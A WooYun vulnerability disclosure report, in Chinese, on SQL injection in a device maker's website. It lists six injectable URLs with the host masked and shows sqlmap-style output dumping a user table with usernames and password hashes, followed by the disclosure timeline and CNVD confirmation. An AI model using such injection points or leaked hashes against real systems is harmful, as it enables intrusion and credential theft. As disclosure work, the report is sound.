乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
欧拓集团存在多处sql注入漏洞。。。欧拓集团是一家集研发、生产及销售为一体的OEM,ODM企业,在通讯设备行业颇具口碑、影响力,旗下有奥力正格、欧拓斯 、力丰辉科技和众志实业4家子公司。现有2000多名员工,主要生产和销售手机、智能家居、智能机器人、互联网及各种OEM.ODM等智能移动终端产品为一体的企业。
URL:http://**.**.**.** 注入点:
http://**.**.**.**/Company.asp?id=7http://**.**.**.**/pzhi.asp?id=48http://**.**.**.**/Service.asp?id=38http://**.**.**.**/Marketing.asp?id=13http://**.**.**.**/Job.asp?id=20http://**.**.**.**/Contact.asp?id=25
实例注入演示:
http://**.**.**.**/Company.asp?id=7
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdbTable: userinfo[5 columns]+---------+-------------+| Column | Type |+---------+-------------+| about | non-numeric || groupid | numeric || id | numeric || uname | non-numeric || upass | non-numeric |+---------+-------------+
Database: Microsoft_Access_masterdbTable: userinfo[3 entries]+----+--------------------+-------+-------+------------------+| id | groupid | about | uname | upass |+----+--------------------+-------+-------+------------------+| 58 | 200511131548585180 | NULL | Ben | f304cd853aa6e483 || 59 | 200511131548585180 | NULL | huosu | 965eb72c92a549dd || 60 | NULL | hs | 965eb72c92a549dd |+----+--------------------+-------+-------+------------------+
过滤。。。。
危害等级:高
漏洞Rank:10
确认时间:2016-01-15 18:20
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无